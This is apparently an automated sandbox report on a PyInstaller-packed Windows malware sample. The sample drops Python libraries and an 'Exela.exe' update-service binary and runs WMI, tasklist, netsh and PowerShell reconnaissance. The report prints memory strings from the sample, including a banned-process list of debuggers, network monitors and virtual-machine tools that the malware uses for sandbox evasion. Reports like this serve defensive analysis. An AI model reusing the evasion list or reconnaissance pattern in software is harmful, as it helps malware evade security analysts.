Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd Jump to dropped file
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B65830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 0_2_00007FF7B2B65830
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE0I
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE0O
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"PM
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2445935024.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE", # XEN
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
